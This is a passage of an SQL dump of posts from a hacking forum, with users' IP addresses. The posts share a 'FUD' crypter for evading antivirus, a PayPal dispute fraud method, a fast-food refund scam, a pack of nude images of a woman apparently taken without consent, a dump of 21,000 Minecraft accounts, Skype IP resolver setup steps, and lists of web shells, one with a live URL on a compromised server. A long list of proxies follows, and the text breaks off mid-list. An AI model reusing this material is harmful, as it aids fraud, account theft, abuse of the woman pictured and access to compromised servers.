sirchamp are the only participants, how bout we see who wins?', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '4ad97c67ba2cb72d6415916a764e8d94', '0', '0'); INSERT INTO mybb_posts VALUES('2806', '565', '0', '20', '[FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1348925569', '[align=center][img]http://i.imgur.com/SMzeY.png[/img]\r\n\r\n\r\n\r\n[img]http://i.imgur.com/vzO5c.png[/img]\r\n\r\n\r\n\r\nDownload : http://www.mediafire.com/?q24fp0ua6n65nfb\r\n\r\n\r\nThis isn\'t my crypter, I got this from a HF post, but I thought it was HQ enough to share here ;D enjoy.[/align]', '65.96.215.138', '1096865674', '1', '0', '100', '1348925626', '1', 'd8bac8c320cef1e0c059542a574fcd4f', '0', '1348925626'); INSERT INTO mybb_posts VALUES('2807', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348932141', 'I agree with you 100%. Who knows?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1998e8d5235af9c11ecd311e504fd25e', '0', '0'); INSERT INTO mybb_posts VALUES('2809', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348932404', 'They changed their domains from MyBBTopSites to ForumTopSites.net/\n\n\nI don\'t think L33tHacking is on there so.. t3h jok3r should be informed of this', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8864f84ba0067afb7f92047b97dd56d2', '0', '0'); INSERT INTO mybb_posts VALUES('2810', '566', '0', '16', 'Free Xbox360 Points/XBL Gold Method', '0', '82', 'iTzIpod', '1348932963', 'First this is a method that requires the following\r\n\r\n[list]\r\n[*]A Paypal Account\r\n[*]Money In your PP\r\n[*]Abit of SE skills.\r\n[*]Patience\r\n[/list]\r\n\r\nNow head over [url=http://electronicfirst.com/]here[/url] and go to the xbox 360 section, choose either a XBL code or points, but make sure it\'s region free otherwise you won\'t get your money back.\r\n\r\nNow once You choose the product add it to your basket then click the paypal checkout button then pay for it and then go back to paypal.\r\n\r\nFind your transaction you made for the XBL product and open a dispute over it say something like it was invalid or not working. or if you don\'t want to dispute it email them [url=http://electronicfirst.com/support-with-xbox-live-codes-microsoft-points/contact-electronic-first/]here[/url] and ay something like\r\n\r\n\"Hello,\r\n\r\nI recently bought a xbox 360 code and when I tried to redeem it it said it was Invalid, this was a region free code.\"\r\n\r\nPlease note when you contact them you need to Socially engineer them.\r\nNow you either wait for them to contact you back or if you disputed it on paypal wait till it gets recovered heres proof i got my money back when I disputed the payment:\r\n\r\n[img]http://puu.sh/17puc[/img]\r\n\r\nThanks and enjoy.\r\n\r\nAlso you don\'t just need to do this on 1 site you can do it on a few.\r\nHope it helps.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '219609821d533d63e1c8dfcedad54b18', '0', '0'); INSERT INTO mybb_posts VALUES('2811', '567', '0', '16', 'How to SE McDonalds', '0', '82', 'iTzIpod', '1348933081', '1. Find a busy McDonalds\r\n2. Walk to the counter and say you just came from the drive through and they completely messed your order up.\r\n3. If they ask for a receipt say you threw it away with your food.\r\n4. Now wait for a replacement :3\r\n\r\n*I use this to get free Chicken Nuggets like once per week haha it works 8/10 times', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5e9ffa3fed7f20d44c932b66e0174e5', '0', '0'); INSERT INTO mybb_posts VALUES('2812', '568', '0', '61', '500+ pictures of same girl E-Whore pack', '0', '82', 'iTzIpod', '1348933347', 'Got this from the uploadnsell exploit program \r\nGirl is actually decent looking :hurr:\r\n\r\nWhat is included:\r\nOver 500 images of a girl, nude and not. Good quality images, girl 7/10 in my book. Have fun with whatever you use this for!\r\n\r\nPreview\r\n[spoiler][img]http://desmond.imageshack.us/Himg805/scaled.php?server=805&filename=picture255u.jpg&res=landing[/img][/spoiler]\r\n\r\n29.8 MB file, and there\'s not even AdFly, just a straight link to uppit :) enjoy!\r\n[url=http://uppit.com/bkv1qlu6m5n1/my_cam_pics.rar][color=#32CD32]Click4N00dz[/color][/url]\r\n\r\n\r\n[color=#FF0000][url=http://anubis.iseclab.org/?action=result&task_id=13aed453ac00bbca45190fd9498db73ca&format=html]VirusScan[/url][/color]\r\nEdit on virus scan: Anyone know why it says iexplorer.exe? The entire pack is just pictures, maybe someone can teach me how to scan properly- Thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de9ace878e3e6c5091d8f505b9bf58f4', '0', '0'); INSERT INTO mybb_posts VALUES('2813', '569', '0', '74', '21,000 Minecraft Account Dump', '0', '82', 'iTzIpod', '1348933647', 'Sorry if some don\'t work just seen this on a forum.\r\n\r\nTo View: http://adf.ly/DHxyq\r\nTo View Mirror: http://adf.ly/DHy1h\r\n\r\nTo Download: http://adf.ly/DHy2x\r\n\r\nEnjoy. Please don\'t leech. Post a thanks! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '87758cda95302117265692e6ef2dac40', '0', '0'); INSERT INTO mybb_posts VALUES('2814', '570', '0', '61', 'Adf.ly + Adfoc.us Bot', '0', '82', 'iTzIpod', '1348933809', '[color=#FF0000][size=large]Hey guys, I\'m leaking another program![/size][/color]\r\n\r\n[color=#FF4500]This is a really simple to use! Check it out.[/color]\r\n\r\nWorks with [b]Adf.ly[/b] links and [b]Adfoc.us[/b] links!\r\n\r\n[color=#FF4500][size=large][b]ScreenShots:[/b][/size][/color]\r\n\r\n[img]http://img706.imageshack.us/img706/480/adflybot.png[/img]\r\n\r\n[color=#FF1493][b]Proof :[/b][/color] [img]http://img69.imageshack.us/img69/4334/58c0cba72724492d8b90e18.png[/img]\r\n\r\n[url=https://www.virustotal.com/file/af40b97913f588202d60633d61a51cf1658858d146e147364008f521b7bd812c/analysis/]Virus Scan [Click Here][/url]\r\n\r\n[url=http://www.mediafire.com/?y1uwytnnfvc224n]Download link [Click Here][/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8aad78e9e2ebda8322343611e05b8ce8', '0', '0'); INSERT INTO mybb_posts VALUES('2815', '571', '0', '61', 'Skype Resolver|Domain Resolver|Pinger|Skype Spam Bot|Mass Messeger All In One!', '0', '82', 'iTzIpod', '1348933887', '[b]It\'s a useful tool that I would like to share with you guys .\r\n[/b]\r\n[b][url=https://www.virustotal.com/file/3875028447649fa184f89a8a7b2d2445a5c19d6a5fd4698d83c255ba9a0451d3/analysis/1348825401/]Virus Scan[/url][/b]\r\n[b][url=http://www.mediafire.com/?bt1zzptoxpi8jzs]Download[/url][/b]\r\n[b]And just incase:[/b]\r\n[img]http://gyazo.com/07e199452554ed6293330fd56ddb0c3f.png?1348824142[/img]\r\nEnjoy and please leave a comment :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b560e22ddd5495555b26a75b8683a74f', '0', '0'); INSERT INTO mybb_posts VALUES('2816', '572', '0', '61', 'Another Webbased Skype IP Resolver', '0', '82', 'iTzIpod', '1348933993', 'URL: http://dusti.3eeweb.com/resolver.php\r\n\r\nEnjoy. \r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0cf47c84baf89270bc2665cdf11e945e', '0', '0'); INSERT INTO mybb_posts VALUES('2817', '573', '0', '61', 'Free Skype API Source', '0', '82', 'iTzIpod', '1348934091', 'This is the source to make a skype api\r\nhttp://www.mediafire.com/?8jg1wn994gjfhb3\r\nDownload link ^^^^\r\nInstructions\r\n\r\n\r\nSkype Resolver API Setup\r\n------------------------\r\n\r\nThese are instructions for setting up the Skype resolver api on a windows VPS\r\nfrom scratch by DeadCode. There is a possibility that Skype will block the account\r\nyou use for this, so make sure you don\'t use your own, and don\'t use your own from\r\nthe same IP address as the resolver. Changing account and IP address will let the\r\nresolver work again.\r\n\r\nThe php script has an option of outputting json or pure text which is configurable on\r\nline 3 by setting $json = true or $json = false.\r\n\r\nIf you can\'t manage any of these steps, or figure out something if it\'s slightly different\r\nthan I\'ve described, this is not for you. Do NOT PM me about it.\r\n\r\nDO NOT PM ME ABOUT IT, I WILL NOT HELP YOU.\r\n\r\n1. Download and install Microsoft .NET Framework 4: http://www.microsoft.com/en-gb/download/details.aspx?id=17718\r\n\r\n2. Download and install WAMP: http://www.wampserver.com/\r\n\r\n3. Click the WAMP icon in the system tray and click \'Put Online\'.\r\n\r\n4. Once that is set up, go to services and disable the \'wampapache\' service from starting up, and stop the service\r\nfrom running. Instructions on disbaling a service are here, if you aren\'t sure\r\nhow: http://technet.microsoft.com/en-us/library/bb124687(v=exchg.65).aspx\r\n\r\n5. Go to \'C:\\wamp\\bin\\apache\\Apache*****\\bin\\\' and run \'httpd.exe\'. It should appear as a black console window. Leave\r\nit running.\r\n\r\n6. Copy the \'SDKs\' folder to the root of the C: drive. You should have \'C:\\SDKs\\skype\\Skype4COM.dll\' and\r\n\'C:\\SDKs\\skype\\Skype4COMLib.dll\' when this is done.\r\n\r\n7. Open your \'C:\\wamp\\www\\\' folder and copy \'index.php\', \'Skype4ComUserProfile.exe\' and the \'skype\' folder\r\ninto it. If you\'d prefer to build your own exe instead of using mine, open the\r\nSkype4COMUserProfile project in visual studio and build it. You\'ll need to copy \'Skype4COMUserProfile.exe\'\r\nout of the \'Skype4COMUserProfile\\Skype4COMUserProfile\\bin\\Release\\\' folder into the \'C:\\wamp\\www\\\'\r\nfolder.\r\n\r\n8. Run the \'logging-on.reg\' file in the \'C:\\wamp\\www\\skype\\\' folder and allow it to be added to the registry. This\r\nallows skype to write the log files which the php script reads for IP addresses.\r\n\r\n9. Run \'skype55_patched.exe\' and register and login to a NEW account.\r\n\r\n10. Everything is set up, we just need to allow our program to interact with skype.\r\n\r\n11. Go to \'http://localhost/index.php?name=echo123\' in a browser. Skype should flash up and show a message\r\nasking if \'Skype4COMUserProfile.exe\' is allowed to communicate with it. Click allow, and we\'re done!\r\n\r\n12. Your Skype resolver is running. There is no protection from crashes, though if Skype is not running the php\r\nscript will return an error if in json mode. Skype and httpd.exe need to be running at all times. If they\r\naren\'t, it wont work. Make sure you don\'t log out of your vps.\r\n\r\nToo big for a Virus Scan sorry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e265cf4a54cf40e036c01d8c604e66c9', '0', '0'); INSERT INTO mybb_posts VALUES('2818', '574', '0', '61', 'Clean Thread Design', '0', '82', 'iTzIpod', '1348934403', '[url=http://www.mediafire.com/?ge65xaf145w4fsn]Download Link (Mediafire)[/url]\r\n\r\n[b]Please post if this helped![/b]\r\n\r\n[img]http://imgf.tw/718629387.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ff8ae1e37ee806fbd1198a6128c4aa4f', '0', '0'); INSERT INTO mybb_posts VALUES('2819', '575', '0', '61', 'Free Ultimate Design Pack Size 2.4GB+', '0', '82', 'iTzIpod', '1348934483', 'I\'ll make this quick cause I don\'t have a lot of time. I am giving out a compilation of all the graphic packs I have acquired over the last month or two of designing websites. These are some of my favorites. I also included some stuff for designing YouTube background\'s etc.\r\n\r\n[align=center][size=medium][b][color=#9400D3]Here is what is in the pack:[/color][/b][/size]\r\n[img]http://gyazo.com/d82f6dbcb19dbbcb5c494c19d11078a7.png[/img]\r\n\r\n[img]http://gyazo.com/7aaaa5eb3f7b165df00e5638c2e44fd5.png[/img]\r\n\r\n[img]http://gyazo.com/de8981b17f7edd3a54b4eb7285f0e5ce.png[/img]\r\n\r\n[img]http://gyazo.com/f9534ee46855b5a1568b3a77269992ce.png[/img]\r\n\r\n[img]http://gyazo.com/28ec1c5d4bcbafbdf51f76af831a5d53.png[/img]\r\n\r\n[img]http://gyazo.com/473fb7c88620a55f3885d6d657551f36.png[/img]\r\n\r\n[img]http://gyazo.com/19aeba66144287a6ef3a71b8896ec63e.png[/img]\r\n\r\n[b][color=#9400D3][size=medium]Download Links:[/size][/color][/b]\r\nThere are 5 parts and together it is around 2.5gb.\r\n[url=http://adf.ly/D377a]Part 01[/url]\r\n[url=http://adf.ly/D37TE]Part 02[/url]\r\n[url=http://adf.ly/D37Wn]Part 03[/url]\r\n[url=http://adf.ly/D37YX]Part 04[/url]\r\n[url=http://adf.ly/D37b4]Part 05[/url]\r\n\r\nAll of the packs should still contain the credits of the original authors. Enjoy[/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc72873d9aff73b10da958d768397239', '0', '0'); INSERT INTO mybb_posts VALUES('2820', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '53', 'sirchamp', '1348939740', 'I sit on a couch and read a book. Or sometimes I play Call of Duty or oblivion. And the odd time, only with my friends, I smoke weed.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '24065f5b3af188e527080570651a77da', '0', '0'); INSERT INTO mybb_posts VALUES('2821', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '203', 'NeonLights', '1348941725', 'What version is this? and is it still FUD? because version 4.9 isnt FUD...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '9e0a0f48df5fdc2b3a87970c78f4a023', '0', '0'); INSERT INTO mybb_posts VALUES('2822', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1348941886', 'Oh, well in that case it may not be FUD, again I just got this from HF.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '87fd0bdeeeb43aee12eace3576ed269f', '0', '0'); INSERT INTO mybb_posts VALUES('2823', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '100', '??zg???g????61', '1348942265', 'I go on L33T hacking xD other then that, I work on my Booter and my other programs I\'m coding these days.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '77d970f80dd3bfbccc84009b1fe5d02d', '0', '0'); INSERT INTO mybb_posts VALUES('2824', '565', '2822', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '203', 'NeonLights', '1348943126', '[quote=\'GRONgamer61\' pid=\'2822\' dateline=\'1348941886\']\r\nOh, well in that case it may not be FUD, again I just got this from HF.\r\n[/quote]\r\n\r\nalright :) was just checking cuz ive used chrom before and there products arent the best but nice share anyways', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '9449ff2f80988783713e3c4e9cd75356', '0', '0'); INSERT INTO mybb_posts VALUES('2825', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '53', 'sirchamp', '1348945023', 'Lol. Who would be so stupid and use 2 Antiviruses. Using 2 antiviruses just make your computer slower and it still wont make your computer safer.', '188.155.56.90', '-1130678182', '1', '0', '53', '1348945043', '1', '3501788f58ed654593bf4f79f22e666c', '0', '1348945043'); INSERT INTO mybb_posts VALUES('2826', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '82', 'iTzIpod', '1348946139', 'My computer is fast. Calm yourself..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e0f94102efec2ee80ef1ee927804018', '0', '0'); INSERT INTO mybb_posts VALUES('2827', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '203', 'NeonLights', '1348949450', 'well i roll some joints, and i go out with friends to smoke them...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '1fec8c0e66be8f6a969408e8ea1ad9b3', '0', '0'); INSERT INTO mybb_posts VALUES('2828', '576', '0', '15', 'The Ultimate HACK PACK', '0', '203', 'NeonLights', '1348949612', '[align=center][img]http://img819.imageshack.us/img819/8806/hackpack.jpg[/img]\n\n[lock]download: http://adf.ly/382489/https://dl.dropbox.com/u/81755269/ULTIMATE%20HACK%20PACK.rar[/lock]\n\ni do not know if this is 100% clean so do not blame me if u get a virus...[/align]', '67.68.75.193', '1128549313', '1', '0', '1', '1352011480', '1', '736789b81653422172b59e711bbb1151', '0', '1352011480'); INSERT INTO mybb_posts VALUES('2829', '577', '0', '61', '1,000+ Shells', '0', '82', 'iTzIpod', '1348949964', 'To View: http://adf.ly/DIJa4\r\nTo Download: http://adf.ly/DIJbK\r\n\r\nDidn\'t use a Shells Checker. So some might not work.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '809946715fcb32061a4b821e7b6273b3', '0', '0'); INSERT INTO mybb_posts VALUES('2830', '578', '0', '61', 'Fresh Shells', '0', '82', 'iTzIpod', '1348950041', 'LEAKED FROM HF\r\nhttp://183.91.25.214/webdav/boss.php\r\n\r\nEnjoy. Just exploiting tons of shells. There is one for free. I have about 120 shells exploited right now, getting more shortly. Fresh! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df9fb39776de67d41133cf8417f921d6', '0', '0'); INSERT INTO mybb_posts VALUES('2831', '579', '0', '61', '3000 Shells (Private and Public)', '0', '82', 'iTzIpod', '1348950196', 'Hello L33thacking.net\n\nHere is one more leak by me! (iTzIpod)\n\n3000 exploited shells! \n\nhttp://adf.ly/DIJvR\n\nPlease leave a \"thanks\" :D', '24.212.197.164', '416597412', '1', '0', '82', '1349039288', '1', 'ac3135a02f6974a738a88c09702275d5', '0', '1349039288'); INSERT INTO mybb_posts VALUES('2832', '580', '0', '61', '500+ Fresh Elite Proxies', '0', '82', 'iTzIpod', '1348950351', 'Fresh list of proxies! \r\n\r\n[code]109.202.41.38:808\r\n164.77.196.78:80\r\n213.134.46.16:80\r\n61.155.95.28:8080\r\n79.170.50.25:80\r\n210.21.96.36:80\r\n94.180.123.34:3128\r\n1.192.126.252:3128\r\n112.2.201.197:6675\r\n58.218.172.230:1337\r\n200.63.85.175:8080\r\n202.194.6.227:8909\r\n199.127.102.203:80\r\n61.138.27.5:8080\r\n78.47.5.222:80\r\n60.10.58.38:8090\r\n93.79.180.141:8080\r\n115.55.61.180:6668\r\n58.216.168.138:1337\r\n91.215.63.62:8080\r\n219.231.190.16:6675\r\n103.247.42.190:3128\r\n176.196.170.137:808\r\n59.66.151.136:8909\r\n103.3.221.153:8080\r\n58.210.247.18:1337\r\n24.46.87.73:8123\r\n117.239.57.228:808\r\n46.211.67.113:54321\r\n46.105.20.6:8080\r\n111.223.88.140:8080\r\n218.28.59.149:8080\r\n122.165.225.12:808\r\n222.172.11.23:9000\r\n188.124.131.29:8123\r\n78.221.156.31:3128\r\n109.87.114.119:3128\r\n109.87.140.48:8080\r\n59.49.19.39:1337\r\n176.36.151.85:80\r\n123.236.246.100:808\r\n217.198.151.246:80\r\n221.213.45.94:8090\r\n194.160.184.114:80\r\n59.53.92.2:8090\r\n117.21.190.51:8090\r\n110.164.82.5:80\r\n110.164.82.5:8080\r\n59.53.92.4:8090\r\n110.53.48.54:8080\r\n195.16.49.214:80\r\n92.50.133.26:88\r\n202.116.160.89:80\r\n92.50.133.26:81\r\n92.50.133.26:8888\r\n196.216.48.67:8080\r\n117.239.16.114:6588\r\n123.11.167.117:6675\r\n115.252.100.245:6588\r\n115.248.245.235:8080\r\n59.53.92.6:8090\r\n112.125.42.20:10080\r\n222.220.34.74:1337\r\n60.63.221.131:6675\r\n211.53.208.125:6666\r\n112.213.109.46:80\r\n112.216.29.245:80\r\n199.127.56.223:3128\r\n117.43.25.34:6666\r\n109.191.219.255:3128\r\n221.130.81.175:1337\r\n60.10.58.62:8090\r\n123.176.60.254:80\r\n221.6.15.157:80\r\n188.135.5.226:8080\r\n124.205.18.183:80\r\n113.106.99.206:9000\r\n05.9.229.146:808\r\n37.59.209.146:808\r\n05.39.37.139:808\r\n113.143.198.113:6668\r\n190.152.99.165:3128\r\n200.239.66.22:443\r\n193.53.4.252:8080\r\n200.143.132.99:80\r\n113.230.76.234:443\r\n113.230.76.234:80\r\n113.243.60.179:6668\r\n111.223.88.138:8080\r\n174.137.152.60:8080\r\n211.154.83.39:82\r\n211.154.83.39:80\r\n218.15.24.67:808\r\n222.111.123.83:3128\r\n222.178.37.42:1337\r\n114.135.23.126:6668\r\n212.170.181.90:8080\r\n210.212.29.147:8080\r\n218.108.168.166:82\r\n202.8.209.78:8080\r\n121.14.59.70:80\r\n124.89.36.178:80\r\n114.80.149.183:80\r\n184.106.205.131:80\r\n115.216.140.220:6668\r\n24.222.195.163:8123\r\n72.44.90.84:8083\r\n115.25.216.6:80\r\n58.24.198.177:6668\r\n222.43.60.178:8080\r\n222.166.104.49:6666\r\n201.0.175.60:80\r\n125.77.127.143:6675\r\n124.127.126.201:6668\r\n122.242.23.206:6668\r\n122.225.17.202:808\r\n119.32.229.40:8909\r\n75.73.103.45:8118\r\n46.29.23.213:80\r\n116.228.205.214:80\r\n218.71.121.9:6668\r\n125.75.144.9:6668\r\n116.255.214.229:3128\r\n116.28.65.249:80\r\n119.186.116.225:6668\r\n116.66.203.44:80\r\n116.66.203.44:8080\r\n119.162.41.72:6668\r\n116.9.66.147:8909\r\n113.106.103.228:80\r\n110.152.89.155:6675\r\n46.181.11.99:54321\r\n221.11.8.90:8080\r\n117.21.190.50:8090\r\n61.18.164.109:9415\r\n196.45.48.16:808\r\n125.46.151.187:6668\r\n211.167.112.14:82\r\n117.87.57.201:6666\r\n211.167.112.14:80\r\n124.244.214.195:3128\r\n119.18.178.75:54321\r\n114.255.193.231:8080\r\n86.12.154.1:80\r\n213.109.84.73:54321\r\n87.106.246.207:8118\r\n118.145.11.230:80\r\n67.55.115.76:8080\r\n118.145.11.232:80\r\n221.6.15.158:80\r\n183.230.2.6:1337\r\n60.194.251.161:6675\r\n1.85.17.250:8090\r\n82.223.130.77:80\r\n69.163.96.22:8080\r\n86.12.154.38:80\r\n110.88.209.66:6675\r\n60.190.189.214:8123\r\n113.106.103.224:80\r\n200.239.66.22:80\r\n173.217.249.99:8123\r\n216.17.106.16:8080\r\n221.207.59.234:8090\r\n98.211.165.194:8085\r\n200.222.105.124:8080\r\n221.10.159.234:1337\r\n88.131.82.241:3128\r\n88.198.64.141:8118\r\n222.197.172.77:808\r\n222.197.160.66:808\r\n89.237.135.3:80\r\n78.47.224.157:80\r\n61.59.159.187:80\r\n61.164.160.30:1080\r\n58.242.21.114:6666\r\n50.7.10.38:3128\r\n50.7.10.37:8080\r\n50.7.10.37:3128\r\n50.7.10.36:8080\r\n50.7.10.36:3128\r\n50.7.10.34:8080\r\n50.7.10.34:3128\r\n222.95.181.205:6675\r\n221.174.234.18:6668\r\n212.101.225.93:3129\r\n212.101.225.93:80\r\n208.67.253.172:80\r\n182.255.0.34:3129\r\n180.126.12.103:6668\r\n123.108.97.75:3636\r\n115.236.61.116:1080\r\n111.226.165.234:6668\r\n110.188.97.7:6668\r\n109.171.1.235:3128\r\n193.239.220.148:443\r\n71.88.103.125:8085\r\n122.81.248.198:1337\r\n209.144.20.18:80\r\n190.9.128.234:80\r\n24.192.165.67:36081\r\n94.23.250.210:80\r\n193.239.220.148:80\r\n195.64.211.173:3128\r\n91.151.52.7:80\r\n68.53.82.151:8085\r\n113.12.71.114:1337\r\n58.246.124.78:6668\r\n27.120.81.191:3128\r\n222.243.158.227:8123\r\n221.195.46.169:6675\r\n221.195.46.169:6666\r\n219.153.70.174:8090\r\n193.147.86.249:3128\r\n187.115.25.79:443\r\n123.148.130.66:6675\r\n113.106.99.203:9000\r\n41.205.230.190:8080\r\n202.115.11.179:808\r\n117.12.245.10:6675\r\n119.226.108.30:8080\r\n113.252.242.195:6666\r\n113.106.99.209:9000\r\n113.106.99.207:9000\r\n96.9.137.12:80\r\n94.231.164.133:3128\r\n91.207.73.83:81\r\n125.39.93.69:8888\r\n119.4.250.97:80\r\n222.255.134.76:3128\r\n124.205.165.226:8080\r\n66.203.202.83:80\r\n78.85.35.222:6588\r\n119.7.45.50:6668\r\n222.83.208.31:6668\r\n222.247.50.15:80\r\n222.136.37.226:6675\r\n221.207.43.98:6668\r\n184.106.182.209:80\r\n120.132.133.174:80\r\n177.69.236.242:80\r\n120.199.55.214:8089\r\n120.32.230.158:6668\r\n180.112.199.116:6666\r\n123.11.116.50:6675\r\n113.134.234.127:6675\r\n113.106.99.211:9000\r\n111.221.40.229:80\r\n175.41.194.124:80\r\n121.22.48.194:80\r\n67.55.121.218:8118\r\n67.55.121.215:8118\r\n60.12.193.43:8090\r\n211.147.213.112:80\r\n122.141.243.216:80\r\n208.67.253.170:80\r\n115.236.73.178:8090\r\n112.65.171.122:8080\r\n220.194.47.221:8080\r\n46.164.140.38:3128\r\n212.34.181.124:3128\r\n122.225.242.139:1337\r\n209.62.12.130:8118\r\n94.56.135.121:80\r\n222.197.188.39:8080\r\n60.6.238.66:1337\r\n37.59.36.48:8080\r\n113.59.34.17:8090\r\n94.137.247.36:3128\r\n221.181.72.156:4000\r\n78.63.208.158:54321\r\n95.65.46.71:54321\r\n218.108.168.164:80\r\n218.108.168.135:80\r\n203.110.178.231:80\r\n202.69.107.114:3128\r\n219.129.199.78:6668\r\n118.72.64.10:6675\r\n222.222.194.99:8090\r\n222.87.110.19:6668\r\n112.115.60.107:6668\r\n221.6.15.158:82\r\n221.6.15.157:82\r\n60.180.3.142:6668\r\n210.76.123.36:80\r\n86.51.159.162:8080\r\n67.55.121.212:8118\r\n93.157.103.243:80\r\n219.217.227.79:80\r\n198.100.157.30:8080\r\n178.18.17.208:8080\r\n206.17.82.114:80\r\n180.117.235.94:6666\r\n61.185.87.105:80\r\n60.12.193.42:8090\r\n59.53.92.3:8090\r\n41.76.222.29:80\r\n96.4.120.47:80\r\n98.226.61.234:36081\r\n94.23.44.132:3128\r\n94.23.25.46:80\r\n94.183.71.121:8080\r\n178.18.17.208:3128\r\n84.241.44.251:8080\r\n199.119.76.22:8080\r\n177.71.227.30:80\r\n199.96.86.158:8080\r\n199.96.86.158:3128\r\n202.116.161.11:808\r\n200.143.132.98:80\r\n202.120.88.12:8080\r\n202.117.56.114:808\r\n94.143.43.224:3128\r\n123.129.214.155:80\r\n123.138.16.82:8080\r\n202.131.237.134:808\r\n123.139.155.106:80\r\n123.139.155.107:80\r\n80.91.168.126:3128\r\n61.152.176.48:80\r\n91.185.26.131:3128\r\n84.241.35.6:3128\r\n61.177.252.38:8080\r\n61.172.203.212:8080\r\n5.9.229.146:808\r\n77.37.192.19:3128\r\n189.73.195.178:3128\r\n221.2.226.12:8080\r\n217.113.5.196:3128\r\n194.190.33.234:3128\r\n211.232.93.13:808\r\n124.240.187.80:80\r\n124.248.211.78:80\r\n177.71.255.202:80\r\n175.184.33.132:80\r\n125.37.60.100:8909\r\n193.93.23.68:80\r\n175.184.34.77:80\r\n125.110.152.136:6668\r\n125.116.198.146:8080\r\n125.125.47.58:6668\r\n113.106.99.246:9000\r\n125.19.133.254:8080\r\n125.216.144.199:8080\r\n113.106.99.245:9000\r\n113.106.99.202:9000\r\n95.31.18.119:3128\r\n94.23.39.54:3128\r\n88.85.251.178:8080\r\n61.135.164.220:80\r\n61.178.78.163:808\r\n61.163.78.51:3128\r\n46.181.19.56:3128\r\n125.39.93.68:8888\r\n178.254.148.56:80\r\n198.100.157.30:3128\r\n23.20.161.66:80\r\n125.75.160.29:6668\r\n217.76.35.238:3128\r\n125.93.47.161:6666\r\n211.67.81.37:808\r\n14.139.120.124:6588\r\n201.217.57.108:80\r\n115.178.121.122:80\r\n46.39.225.33:3128\r\n146.164.122.178:80\r\n216.244.71.93:8087\r\n216.17.106.16:3128\r\n210.22.13.104:80\r\n149.255.102.118:3128\r\n153.19.95.1:80\r\n190.9.128.96:80\r\n162.105.11.161:808\r\n93.166.121.107:8118\r\n66.146.193.31:8118\r\n163.30.162.1:80\r\n164.77.196.75:80\r\n115.85.67.88:3128\r\n202.150.166.218:8080\r\n211.154.83.37:80\r\n95.181.108.17:54321\r\n173.213.108.111:3128\r\n173.213.108.111:8080\r\n173.213.108.112:3128\r\n173.213.108.112:8080\r\n173.213.108.113:3128\r\n173.213.108.113:8080\r\n173.213.108.114:3128\r\n173.213.108.114:8080\r\n200.124.130.140:808\r\n61.7.31.90:54321\r\n123.71.238.107:6675\r\n81.208.47.117:6588\r\n190.92.61.18:8080\r\n123.139.155.103:80\r\n123.139.155.103:82\r\n122.193.31.69:3128\r\n173.224.120.70:8118\r\n111.223.88.141:8080\r\n85.185.45.1:80\r\n175.41.218.110:80\r\n175.41.226.229:80\r\n222.80.72.30:1337\r\n176.36.151.85:443\r\n218.108.242.124:8080\r\n59.53.92.7:8090\r\n218.241.153.43:8080\r\n60.12.177.109:8080\r\n69.163.96.25:8080\r\n218.108.168.164:82\r\n61.135.209.203:81\r\n109.86.201.180:54321\r\n218.108.168.135:82\r\n219.72.228.2:80\r\n217.24.114.114:3128\r\n58.53.192.218:8123\r\n211.154.83.38:82\r\n211.154.83.38:80\r\n211.154.83.35:82\r\n211.154.83.35:80\r\n211.138.123.60:80\r\n202.98.11.116:80\r\n58.22.151.6:80\r\n202.75.217.156:80\r\n198.100.153.111:8600\r\n195.138.81.100:3128\r\n62.45.42.24:80\r\n49.212.174.24:80\r\n180.246.28.41:80\r\n41.86.96.111:8080\r\n199.119.76.22:3128\r\n37.59.157.153:808\r\n125.117.11.130:6675\r\n177.70.9.79:80\r\n123.139.155.104:80\r\n118.102.27.216:8080\r\n23.22.226.194:80\r\n202.121.129.204:8080\r\n222.221.27.13:8080\r\n80.63.56.146:8118\r\n222.197.190.51:808\r\n60.191.124.58:3128\r\n46.49.81.17:3128\r\n222.162.177.225:6675\r\n218.62.97.105:808\r\n221.7.43.71:1337\r\n221.6.154.73:8080\r\n183.63.94.13:8080\r\n202.150.166.218:80\r\n202.142.17.120:80\r\n125.76.237.68:80\r\n174.137.184.37:8080\r\n173.10.134.173:8081\r\n123.129.242.131:8081\r\n122.170.3.229:3128\r\n103.3.221.154:8080\r\n96.44.168.147:443\r\n221.6.15.156:80\r\n94.228.226.200:8080\r\n93.189.216.77:3128\r\n93.78.214.219:3128\r\n86.51.159.162:80\r\n85.92.159.84:8080\r\n85.185.45.9:80\r\n85.185.45.3:80\r\n85.185.45.19:80\r\n85.185.45.16:80\r\n85.185.45.14:80\r\n